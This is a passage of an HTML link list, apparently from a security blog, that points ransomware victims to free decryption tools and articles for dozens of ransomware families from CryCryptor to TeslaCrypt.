<li><a href="https://github.com/eset/cry-decryptor/releases/download/v1.0/CryDecryptor.apk" target="_blank" rel="noopener"><strong>CryCryptor ransomware decrypting tool</strong></a></li>
<li><a href="https://github.com/pekeinfo/DecryptCrypren" target="_blank" rel="noopener"><strong>Crypren ransomware decrypting tool</strong></a></li>
<li><strong><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/crypt32" target="_blank" rel="noopener">Crypt32 ransom decryptor</a></strong></li>
<li><a href="https://blog.fortinet.com/2016/06/17/buggy-russian-ransomware-inadvertently-allows-free-decryption" target="_blank" rel="noopener"><strong>Crypt38 ransomware decrypting tool</strong></a></li>
<li><a href="http://www.avg.com/us-en/ransomware-decryption-tools#crypt888" target="_blank" rel="noopener"><strong>Crypt888 (see also Mircop) decrypting tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/cryptinfinite" target="_blank" rel="noopener"><strong>CryptInfinite decrypting tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/cryptodefense" target="_blank" rel="noopener"><strong>CryptoDefense decrypting tool</strong></a></li>
<li><a href="https://files.avast.com/files/decryptor/avast_decryptor_cryptomix.exe" target="_blank" rel="noopener"><strong>CryptFile2 decrypting tool</strong></a> (decrypted by the CryptoMix Decryptor)</li>
<li><a href="http://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/" target="_blank" rel="noopener"><strong>CryptoHost (a.k.a. Manamecrypt) decrypting tool</strong></a></li>
<li><strong><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener">Cryptokluchen decrypting tool</a> </strong>(decrypted by the Rakhni Decryptor)</li>
<li><a href="https://thehackernews.com/2014/08/CryptoLocker-Decryption-Keys-Tool.html" target="_blank" rel="noopener"><strong>Cryptolocker ransomware decryption tool</strong></a></li>
<li><a href="https://nomoreransom.cert.pl/static/cryptomix_decryptor.exe" target="_blank" rel="noopener"><strong>CryptoMix Ransom decrypting tool + </strong></a><a href="https://files.avast.com/files/decryptor/avast_decryptor_cryptomix.exe" target="_blank" rel="noopener"><strong>offline alternative</strong></a></li>
<li><a href="https://www.bleepingcomputer.com/news/security/emsisoft-releases-a-decryptor-for-the-crypton-ransomware/" target="_blank" rel="noopener"><strong>CryptON decryption tool</strong></a></li>
<li><a href="http://www.bleepingcomputer.com/forums/t/565020/new-cryptotorlocker2015-ransomware-discovered-and-easily-decrypted/" target="_blank" rel="noopener"><strong>CryptoTorLocker decrypting tool</strong></a></li>
<li><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/rannohdecryptor.zip" target="_blank" rel="noopener"><strong>CryptXXX Ransom decryptor (V1, V2, V3)</strong></a> (decrypted by Rannoh Decryptor) + <strong><a href="https://powerbox-na-file.trend.org/SFDC/DownloadFile_iv.php?jsonInfo=%7b%22Query%22%3a%22jn1XVHnvtwlVGuZ9XTrPudWOVgKHfE1fVf4mh9XXETPsT4jEX1DzaXiIio6niXlTxEHkXvbf%2fag68Dmuv%2fz0adD%2f3a4rmG1FhFP7q1cJhqLLyvO8VuBr65fUerKjrrzMQWzRT86MuUneIx7%2b%2bi8LufENTYCTK1vakiJw0ij34qulyJRwqAHlBbxuMm5Zy%2b5BmueD%2bfAyd%2bJceSs3oSW6q3VL9gl11LWas2jPQvUCZM9D9UDepgprqnQtF%2fU7D7%2bon%2b3OSp8OdBwED8qp9RgXb53hqzal2kXNlyntYczTaOo%3d%22%2c%22iv%22%3a%22db0d918f007fe97830d4cbc2e44b4cd2%22%7d" target="_blank" rel="noopener">alternative (V1, V2, V3, V4, V5)</a></strong></li>
<li><a href="https://www.nomoreransom.org/decryption-tools.html" target="_blank" rel="noopener"><strong>CrySIS ransomware decryption tool</strong></a> (decrypted by the Rakhni Decryptor – <a href="https://www.bleepingcomputer.com/news/security/master-decryption-keys-and-decryptor-for-the-crysis-ransomware-released-/" target="_blank" rel="noopener"><strong>additional details</strong></a><u>)</u></li>
<li><a href="https://heimdalsecurity.com/blog/ctb-locker-ransomware/" target="_blank" rel="noopener"><strong>CTB-Locker</strong></a><a href="https://thisissecurity.net/2016/02/26/a-lockpicking-exercise/" target="_blank" rel="noopener"><strong>Web decrypting tool</strong></a></li>
<li><a href="https://github.com/aaaddress1/my-Little-Ransomware/tree/master/decryptoTool" target="_blank" rel="noopener"><strong>CuteRansomware decrypting tool</strong></a>(decrypted by the my-Little-Ransomware Decryptor)</li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/cyborg" target="_blank" rel="noopener"><strong>Cyborg ransomware decryption tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/download/damage" target="_blank" rel="noopener"><strong>Damage ransom decrypting tool</strong></a></li>
<li><a href="https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/" target="_blank" rel="noopener"><strong>Darkside ransomware decryption tool</strong></a></li>
<li><a href="https://solutionfile.trendmicro.com/solutionfile/Ransomware%20Decryption%20Tool/RansomwareFileDecryptor%201.0.1668%20MUI.zip" target="_blank" rel="noopener"><strong>DemoTool decrypting tool</strong></a></li>
<li><a href="http://tmp.emsisoft.com/fw/decrypt_mblblock.exe" target="_blank" rel="noopener"><strong>DeCrypt Protect decrypting tool</strong></a></li>
<li><strong><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener">Democry decrypting tool</a> </strong>(decrypted by the Rakhni Decryptor)</li>
<li><a href="https://www.nomoreransom.org/en/decryption-tools.html" target="_blank" rel="noopener"><strong>Derialock ransom decryptor tool</strong></a></li>
<li><strong><u><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener">Dharma ransomware decrypt tool</a></u></strong> (decrypted by Rakhni Decryptor) (.wallet extension ransomware decrypt tool)</li>
<li><strong><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/diavol" target="_blank" rel="noopener">Diavol ransomware decryption tool</a></strong> + <a href="https://www.emsisoft.com/ransomware-decryption-tools/howtos/emsisoft_howto_diavol.pdf" target="_blank" rel="noopener"><strong>guide </strong></a></li>
<li><a href="https://decrypter.emsisoft.com/dmalocker" target="_blank" rel="noopener"><strong>DMA Locker decrypting tool</strong></a>+ <a href="https://decrypter.emsisoft.com/dmalocker2" target="_blank" rel="noopener"><strong>DMA2 Locker decoding tool</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/jigsaw" target="_blank" rel="noopener"><strong>DragonCyber ransomware decryption tool</strong></a></li>
<li><a href="https://success.trendmicro.com/solution/1114221" target="_blank" rel="noopener"><strong>DXXD ransomware decryption tool</strong></a></li>
<li><strong><a href="https://www.emsisoft.com/ransomware-decryption-tools/maze-sekhmet-egregor" target="_blank" rel="noopener">Egregor ransomware decryption tool</a></strong></li>
<li><a href="https://blog.avast.com/avast-releases-free-decryption-tool-for-encryptile-ransomware" target="_blank" rel="noopener"><strong>Encryptile decrypting tool</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/jigsaw" target="_blank" rel="noopener"><strong>ElvisPresley ransomware decryption </strong></a><strong>tool </strong>(decrypted by the Jigsaw Decryptor)</li>
<li><a href="https://www.bleepingcomputer.com/news/security/decryptor-released-for-the-everbe-ransomware/" target="_blank" rel="noopener"><strong>Everbe Ransomware decrypting tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/fabiansomware" target="_blank" rel="noopener"><strong>Fabiansomware decrypting tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/fenixlocker" target="_blank" rel="noopener"><strong>FenixLocker – decrypting tool</strong></a></li>
<li><strong><u><a href="https://www.bleepingcomputer.com/download/fileslockerdecrypter/dl/378/" target="_blank" rel="noopener">FilesLocker (V1 and V2) decrypting tool</a></u></strong></li>
<li><a href="https://files.avast.com/files/decryptor/avast_decryptor_findzip.exe" target="_blank" rel="noopener"><strong>FindZip decrypting tool</strong></a></li>
<li><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener"><strong>FortuneCrypt decrypting tool</strong></a> (decrypted by the Rakhni Decryptor)</li>
<li><a href="https://files.avast.com/files/decryptor/avast_decryptor_fonix.exe?_ga=2.41428578.1980021587.1617009290-1534942480.1617009290" target="_blank" rel="noopener"><strong>Fonix ransomware decryption tool</strong></a></li>
<li><strong><a href="https://www.nomoreransom.org/decryption-tools.html" target="_blank" rel="noopener">Fury decrypting tool</a> </strong>(decrypted by the Rannoh Decryptor)</li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/galacticrypter" target="_blank" rel="noopener"><strong>GalactiCryper ransom decryptor</strong></a></li>
<li><strong><u><a href="https://download.bitdefender.com/am/malware_removal/BDGandCrabDecryptTool.exe" target="_blank" rel="noopener">GandCrab ransomware decryption tool (V1, V4, V5)</a> + <a href="https://www.bleepingcomputer.com/news/security/release-of-gandcrab-52-decryptor-ends-a-bad-ransomware-story/" target="_blank" rel="noopener">gandcrab 5.2 ransomware decryption tool</a></u></strong></li>
<li><strong><a href="https://www.majorgeeks.com/files/details/stopdecrypter.html" target="_blank" rel="noopener">Gerosan ransomware decrypt tool</a></strong></li>
<li><a href="https://www.emsisoft.com/decrypter/download/getcrypt" target="_blank" rel="noopener"><strong>GetCrypt decryption tool</strong></a></li>
<li><a href="https://download.bleepingcomputer.com/demonslay335/GhostCryptDecrypter.zip" target="_blank" rel="noopener"><strong>GhostCrypt decrypting tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/" target="_blank" rel="noopener"><strong>Globe / Purge decrypting tool</strong></a>+ <a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221" target="_blank" rel="noopener"><strong>alternative</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/download/globe2" target="_blank" rel="noopener"><strong>Globe2 decryption tool</strong></a></li>
<li><a href="http://blog.emsisoft.com/2017/01/04/emsisoft-releases-free-decrypter-for-globe3-ransomware/" target="_blank" rel="noopener"><strong>Globe3 decryption tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/download/globeimposter" target="_blank" rel="noopener"><strong>GlobeImpostor decryption tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/gomasom" target="_blank" rel="noopener"><strong>Gomasom decrypting tool</strong></a></li>
<li><a href="https://labs.bitdefender.com/2020/05/gogoogle-decryption-tool/" target="_blank" rel="noopener"><strong>GoGoogle decryption tool</strong></a></li>
<li><a href="https://www.bleepingcomputer.com/ransomware/decryptor/emsisoft-has-released-a-decryptor-for-the-hacked-ransomware/" target="_blank" rel="noopener"><strong>Hacked decrypting tool</strong></a></li>
<li><a href="https://blog.emsisoft.com/en/34716/emsisoft-releases-a-new-decryptor-for-hakbit-ransomware/" target="_blank" rel="noopener"><strong>Hakbit decryptor</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/harasom" target="_blank" rel="noopener"><strong>Harasom decrypting tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/hydracrypt" target="_blank" rel="noopener"><strong>HydraCrypt decrypting tool</strong></a></li>
<li><a href="https://files.avast.com/files/decryptor/avast_decryptor_hiddentear.exe" target="_blank" rel="noopener"><strong>HiddenTear decrypting tool</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/hildacrypt" target="_blank" rel="noopener"><strong>HildraCrypt decryptor</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/download/hkcrypt" target="_blank" rel="noopener"><strong>HKCrypt ransom decryptor</strong></a></li>
<li><a href="https://www.emsisoft.com/decrypter/ims00rry" target="_blank" rel="noopener"><strong>Iams00rry decryptor</strong></a></li>
<li><a href="https://www.bleepingcomputer.com/download/insanecrypt-desucrypt-decrypter/dl/369/" target="_blank" rel="noopener"><strong>InsaneCrypt ransomware decryptor</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/ransomwared" target="_blank" rel="noopener"><strong>Iwanttits ransomware decryptor</strong></a></li>
<li><a href="http://www.bankinfosecurity.com/two-new-ransomware-decryptors-give-victims-free-out-a-9998" target="_blank" rel="noopener"><strong>Jaff decrypter tool</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/javalocker" target="_blank" rel="noopener"><strong>JavaLocker decryptor</strong></a></li>
<li><a href="https://blog.checkpoint.com/wp-content/uploads/2016/07/JPS_release.zip" target="_blank" rel="noopener"><strong>Jigsaw decrypting tool</strong></a>+ <strong><a href="https://www.bleepingcomputer.com/download/stupiddecryptor/dl/351/" target="_blank" rel="noopener">alternative 1</a> + <a href="https://powerbox-na-file.trend.org/SFDC/DownloadFile_iv.php?jsonInfo=%7b%22Query%22%3a%22jn1XVHnvtwlVGuZ9XTrPudWOVgKHfE1fVf4mh9XXETPsT4jEX1DzaXiIio6niXlTxEHkXvbf%2fag68Dmuv%2fz0adD%2f3a4rmG1FhFP7q1cJhqLLyvO8VuBr65fUerKjrrzMQWzRT86MuUneIx7%2b%2bi8LufENTYCTK1vakiJw0ij34qulyJRwqAHlBbxuMm5Zy%2b5BmueD%2bfAyd%2bJceSs3oSW6q3VL9gl11LWas2jPQvUCZM9D9UDepgprqnQtF%2fU7D7%2bon%2b3OSp8OdBwED8qp9RgXb53hqzal2kXNlyntYczTaOo%3d%22%2c%22iv%22%3a%22db0d918f007fe97830d4cbc2e44b4cd2%22%7d" target="_blank" rel="noopener">alternative 2</a> + <a href="https://www.emsisoft.com/ransomware-decryption-tools/download/jigsaw" target="_blank" rel="noopener">alternative 3</a></strong></li>
<li><a href="https://www.emsisoft.com/decrypter/download/jsworm-20" target="_blank" rel="noopener"><strong>JS WORM 2.0 decryptor</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/jsworm-40" target="_blank" rel="noopener"><strong>JS WORM 4.0 decryptor</strong></a></li>
<li><a href="https://mdsassets.blob.core.windows.net/downloads/Judge-Decryptor.exe" target="_blank" rel="noopener"><strong>Judge ransomware decryptor</strong></a></li>
<li><a href="http://news.drweb.com/show/?i=9877&amp;lng=en&amp;c=5" target="_blank" rel="noopener"><strong>KeRanger decrypting tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/keybtc" target="_blank" rel="noopener"><strong>KeyBTC decrypting tool</strong></a></li>
<li><a href="https://blog.fortinet.com/2016/04/01/kimcilware-ransomware-how-to-decrypt-encrypted-files-and-who-is-behind-it" target="_blank" rel="noopener"><strong>KimcilWare decrypting tool</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/kokokrypt" target="_blank" rel="noopener"><strong>KokoKrypt decryptor</strong></a></li>
<li><strong><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener">Lamer decrypting tool</a> </strong>(decrypted by the Rakhni Decryptor)</li>
<li><a href="https://files.avast.com/files/decryptor/avast_decryptor_lambdalocker.exe" target="_blank" rel="noopener"><strong>LambdaLocker decryption tool</strong></a></li>
<li><a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221" target="_blank" rel="noopener"><strong>LeChiffre decrypting tool</strong></a>+ <a href="https://decrypter.emsisoft.com/lechiffre" target="_blank" rel="noopener"><strong>alternative</strong></a></li>
<li><a href="http://www.avg.com/us-en/ransomware-decryption-tools#legion" target="_blank" rel="noopener"><strong>Legion decrypting tool</strong></a></li>
<li><a href="https://labs.bitdefender.com/2015/11/linux-ransomware-debut-fails-on-predictable-encryption-key/" target="_blank" rel="noopener"><strong>Linux.Encoder decrypting tool</strong></a></li>
<li><strong><a href="https://labs.bitdefender.com/wp-content/plugins/download-monitor/download.php?id=encoder_3_decrypter.zip" target="_blank" rel="noopener">Linux.Encoder.3 ransom decryption tool</a></strong></li>
<li><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener"><strong>Lobzik decrypting tool</strong></a>(decrypted by the Rakhni Decryptor)</li>
<li><strong><a href="https://files.avast.com/files/decryptor/avast_decryptor_atomsilo.exe" target="_blank" rel="noopener">LockFile ransomware decryptor tool</a></strong></li>
<li><a href="https://esupport.trendmicro.com/en-us/home/pages/technical-support/1105975.aspx" target="_blank" rel="noopener"><strong>Lock Screen ransomware decrypting tool</strong></a></li>
<li><a href="http://www.bleepingcomputer.com/forums/t/577246/locker-ransomware-support-and-help-topic/page-32#entry3721545" target="_blank" rel="noopener"><strong>Locker decrypting tool</strong></a></li>
<li><a href="https://www.emsisoft.com/decrypter/loocipher" target="_blank" rel="noopener"><strong>Loocipher decryptor</strong></a></li>
<li><a href="https://mdsassets.blob.core.windows.net/downloads/Lorenz-Decryptor.exe" target="_blank" rel="noopener"><strong>Lorenz ransomware decryptor</strong></a></li>
<li><strong><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener">Lortok decrypting tool</a> </strong>(decrypted by the Rakhni Decryptor)</li>
<li><a href="https://esupport.trendmicro.com/media/13801530/Trend%20Micro%20Ransomware%20Decryptor_V1.0.1.zip" target="_blank" rel="noopener"><strong>MacRansom decrypting tool</strong></a></li>
<li><a href="https://seed.kisa.or.kr/kisa/Board/56/detailView.do" target="_blank" rel="noopener"><strong>Magniber decryptor</strong></a></li>
<li><a href="https://labs.bitdefender.com/2020/10/mamocrypt-ransomware-decryption-tool/" target="_blank" rel="noopener"><strong>MaMoCrypt ransomware decryption tool</strong></a></li>
<li><a href="https://nomoreransom.cert.pl/static/mapo_decryptor.exe" target="_blank" rel="noopener"><strong>Mapo ransomware decryptor</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/download/marlboro" target="_blank" rel="noopener"><strong>Marlboro ransom decryption tool</strong></a></li>
<li><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rannohdecryptor.zip" target="_blank" rel="noopener"><strong>MarsJoke decryption tool</strong></a></li>
<li><a href="http://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/" target="_blank" rel="noopener"><strong>Manamecrypt decrypting tool (a.k.a. CryptoHost)</strong></a></li>
<li><strong><a href="https://www.emsisoft.com/ransomware-decryption-tools/maze-sekhmet-egregor" target="_blank" rel="noopener">Maze ransomware decryption tool</a></strong></li>
<li><a href="https://www.emsisoft.com/decrypter/download/megalocker" target="_blank" rel="noopener"><strong>MegaLocker ransomware decrypting tool</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/mrcr" target="_blank" rel="noopener"><strong>Merry Christmas / MRCR decryptor</strong></a><strong><u> + <a href="https://blog.checkpoint.com/wp-content/uploads/2017/03/MXM_Decryptor-3.7z" target="_blank" rel="noopener">alternative</a></u></strong></li>
<li><a href="https://download.f-secure.com/support/tools/Mira-decryptor/Mira%20Ransomware%20Decryptor.zip" target="_blank" rel="noopener"><strong>Mira ransom decryptor </strong></a></li>
<li><a href="http://now.avg.com/dont-pay-the-ransom-avg-releases-six-free-decryption-tools-to-retrieve-your-files/" target="_blank" rel="noopener"><strong>Mircop decrypting tool</strong></a>+ <a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221" target="_blank" rel="noopener"><strong>alternative</strong></a></li>
<li><a href="https://nomoreransom.cert.pl/static/mole_decryptor.exe" target="_blank" rel="noopener"><strong>Mole decryptor tool</strong></a></li>
<li><a href="https://nioguard.blogspot.com.br/2018/02/decryptor-for-moneropay-ransomware.html" target="_blank" rel="noopener"><strong>MoneroPay ransomware decrypting tool</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/muhstik" target="_blank" rel="noopener"><strong>muhstik ransomware decryptor</strong></a></li>
<li><a href="https://github.com/aaaddress1/my-Little-Ransomware/tree/master/decryptoTool" target="_blank" rel="noopener"><strong>my-Little-Ransomware decrypting tool </strong></a></li>
<li><a href="https://github.com/Cyberclues/nanolocker-decryptor" target="_blank" rel="noopener"><strong>Nanolocker decrypting tool</strong></a></li>
<li><a href="https://mdsassets.blob.core.windows.net/downloads/NemtyDecryptor.exe" target="_blank" rel="noopener"><strong>Nemty ransomware decryptor</strong></a></li>
<li><a href="https://heimdalsecurity.com/blog/security-alert-malicious-script-injections-cerber-nemucod/" target="_blank" rel="noopener"><strong>Nemucod </strong></a><a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221" target="_blank" rel="noopener"><strong>decrypting tool</strong></a> + <a href="https://decrypter.emsisoft.com/nemucod" target="_blank" rel="noopener"><strong>alternative</strong></a></li>
<li><strong><a href="https://decrypter.emsisoft.com/download/nemucodaes" target="_blank" rel="noopener">NemucodAES ransom decryption tool</a></strong></li>
<li><a href="https://decrypter.emsisoft.com/download/nmoreira" target="_blank" rel="noopener"><strong>NMoreira ransomware decryption tool</strong></a></li>
<li><a href="https://files.avast.com/files/decryptor/avast_decryptor_noobcrypt.exe" target="_blank" rel="noopener"><strong>Noobcrypt decryption tool</strong></a></li>
<li><a href="http://download.bleepingcomputer.com/BloodDolly/ODCODCDecoder.zip" target="_blank" rel="noopener"><strong>ODCODC decrypting tool</strong></a></li>
<li><a href="http://blog.emsisoft.com/2016/12/30/emsisoft-releases-free-decrypter-for-opentoyou-ransomware/" target="_blank" rel="noopener"><strong>OpenToYou decryption tools</strong></a></li>
<li><a href="http://www.bleepingcomputer.com/forums/t/559220/operation-global-iii-ransomware-not-only-encrypts-but-infects-your-data-as-well/" target="_blank" rel="noopener"><strong>Operation Global III Ransomware decrypting tool</strong></a></li>
<li><a href="https://labs.bitdefender.com/2019/10/ouroboros-ransomware-decryption-tool/" target="_blank" rel="noopener"><strong>Ouroboros ransomware decryptor</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/download/ozozalocker" target="_blank" rel="noopener"><strong>Ozozalocker ransomware decryptor</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/paradise" target="_blank" rel="noopener"><strong>Paradise ransomware decryptor</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/pclock" target="_blank" rel="noopener"><strong>PClock decrypting tool</strong></a></li>
<li><a href="http://www.thewindowsclub.com/petya-ransomware-decrypt-tool-password-generator" target="_blank" rel="noopener"><strong>Petya ransomware decryption tool</strong></a>+ <a href="https://www.bleepingcomputer.com/news/security/author-of-original-petya-ransomware-publishes-master-decryption-key/" target="_blank" rel="noopener"><strong>alternative</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/download/pewcrypt" target="_blank" rel="noopener"><strong>PewCrypt ransom decryptor</strong></a></li>
<li><a href="https://decrypter.emsisoft.com/download/philadelphia" target="_blank" rel="noopener"><strong>Philadelphia decrypting tool</strong></a></li>
<li><a href="http://download.bleepingcomputer.com/BloodDolly/JuicyLemonDecoder.zip" target="_blank" rel="noopener"><strong>PizzaCrypts decrypting tool</strong></a></li>
<li><a href="https://www.bleepingcomputer.com/ransomware/decryptor/planetary-ransomware-decryptor-gets-your-files-back-for-free/" target="_blank" rel="noopener"><strong>Planetary ransomware decrypting tool</strong></a></li>
<li><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener"><strong>Pletor decrypting tool</strong></a> (decrypted by the Rakhni Decryptor)</li>
<li><strong><a href="https://media.kaspersky.com/utilities/VirusUtilities/EN/rannohdecryptor.zip" target="_blank" rel="noopener">Polyglot decrypting tool</a> </strong>(decrypted by the Rannoh Decryptor)</li>
<li><a href="http://www.bleepingcomputer.com/news/security/pompous-ransomware-dev-gets-defeated-by-backdoor/" target="_blank" rel="noopener"><strong>Pompous decrypting tool</strong></a></li>
<li><a href="https://www.helpnetsecurity.com/2016/07/22/powerware-ransomware-decrypter/" target="_blank" rel="noopener"><strong>PowerWare / PoshCoder decrypting tool</strong></a></li>
<li><a href="https://www.nomoreransom.org/en/decryption-tools.html" target="_blank" rel="noopener"><strong>Popcorn ransom decrypting tool</strong></a></li>
<li><strong><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/jigsaw" target="_blank" rel="noopener">Professeur ransomware decryptor</a> </strong>(decrypted by the Jigsaw Decryptor)</li>
<li><strong><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/stop-puma" target="_blank" rel="noopener">Puma ransomware decryption tool</a></strong></li>
<li><u><a href="https://thehackernews.com/2019/01/pylocky-free-ransomware-decryption.html" target="_blank" rel="noopener"><strong>PyLocky ransomware decrypting tool</strong></a></u><strong> + <a href="https://www.cybermalveillance.gouv.fr/nos-articles/outil-de-dechiffrement-du-rancongiciel-ransomware-pylocky-versions-1-et-2/" target="_blank" rel="noopener">alternative</a></strong></li>
<li><a href="https://decrypter.emsisoft.com/radamant" target="_blank" rel="noopener"><strong>Radamant decrypting tool</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/ragnarok" target="_blank" rel="noopener"><strong>RAGNAROK decrypting tool</strong></a></li>
<li><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener"><strong>Rakhni decrypting tool</strong></a></li>
<li><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rannohdecryptor.zip" target="_blank" rel="noopener"><strong>Rannoh decrypting tool</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/ransomwared" target="_blank" rel="noopener"><strong>Ransomwared decryptor </strong></a></li>
<li><a href="https://support.kaspersky.com/viruses/disinfection/4264" target="_blank" rel="noopener"><strong>Rector decrypting tool</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/redrum" target="_blank" rel="noopener"><strong>RedRum ransomware decryptor </strong></a></li>
<li><strong><a href="http://download.bitdefender.com/am/malware_removal/BDREvilDecryptor.exe" target="_blank" rel="noopener">REvil/Sodinokibi ransomware decrypt tool</a></strong></li>
<li><strong><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip" target="_blank" rel="noopener">Rotor decrypting tool</a> </strong>(decrypted by the Rakhni Decryptor)</li>
<li><a href="https://securelist.com/a-flawed-ransomware-encryptor/69481/" target="_blank" rel="noopener"><strong>Scraper decrypting tool</strong></a></li>
<li><strong><a href="https://www.emsisoft.com/ransomware-decryption-tools/maze-sekhmet-egregor" target="_blank" rel="noopener">Sekhmet ransomware decryption tool</a></strong></li>
<li><a href="https://seed.kisa.or.kr/kisa/Board/57/detailView.do" target="_blank" rel="noopener"><strong>SimpleLocker ransomware decryptor</strong></a></li>
<li><a href="https://download.eset.com/com/eset/tools/decryptors/simplocker/latest/eset-simplocker-decryptor.apk" target="_blank" rel="noopener"><strong>Simplocker ransomware decryptor</strong></a></li>
<li><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/ShadeDecryptor.exe" target="_blank" rel="noopener"><strong>Shade / Troldesh ransomware decryption tool + </strong></a><a href="http://www.mcafee.com/us/downloads/free-tools/shadedecrypt.aspx" target="_blank" rel="noopener"><strong>alternative</strong></a><strong> + <a href="https://www.mcafee.com/us/downloads/free-tools/shadedecrypt.aspx" target="_blank" rel="noopener">alternative 2</a></strong></li>
<li><a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221" target="_blank" rel="noopener"><strong>SNSLocker decrypting tool</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/spartcrypt" target="_blank" rel="noopener"><strong>SpartCrypt decryptor</strong></a></li>
<li><a href="https://heimdalsecurity.com/blog/security-alert-stampado-ransomware-on-sale/" target="_blank" rel="noopener"><strong>Stampado</strong></a><a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221" target="_blank" rel="noopener"><strong>decrypting tool</strong></a> + <a href="https://decrypter.emsisoft.com/stampado" target="_blank" rel="noopener"><strong>alternative</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/stop-djvu" target="_blank" rel="noopener"><strong>STOP </strong></a><a href="https://heimdalsecurity.com/blog/kolz-ransomware/" target="_blank" rel="noopener"><strong>Djvu</strong></a> <a href="https://www.emsisoft.com/ransomware-decryption-tools/download/stop-djvu" target="_blank" rel="noopener"><strong>ransomware decrypt tool</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/synack" target="_blank" rel="noopener"><strong>SynAck ransom decryptor</strong></a></li>
<li><a href="https://www.emsisoft.com/ransomware-decryption-tools/download/syrk" target="_blank" rel="noopener"><strong>Syrk ransomware decryptor </strong></a></li>
<li><a href="http://www.avg.com/us-en/ransomware-decryption-tools#szflocker" target="_blank" rel="noopener"><strong>SZFlocker decrypting tool</strong></a></li>
<li><a href="https://success.trendmicro.com/solution/1114221" target="_blank" rel="noopener"><strong>Teamxrat / Xpan decryption tool</strong></a></li>
<li><a href="https://malwarebytes.app.box.com/s/kkxwgzbpwe7oh59xqfwcz97uk0q05kp3" target="_blank" rel="noopener"><strong>TeleCrypt decrypting tool </strong></a><u>(</u><a href="https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/" target="_blank" rel="noopener"><strong>additional details</strong></a><u>)</u></li>
<li><a href="http://talosintel.com/teslacrypt_tool/" target="_blank" rel="noopener"><strong>TeslaCrypt decrypting tool</strong></a>+ <a href="http://www.avg.com/us-en/ransomware-decryption-tools#teslacrypt" target="_blank" rel="noopener"><strong>alternative 1</strong></a> + <a href="https://www.nomoreransom.org/decryption-tools.html" target="_blank" rel="noopener"><strong>alternative 2</strong></a></li>
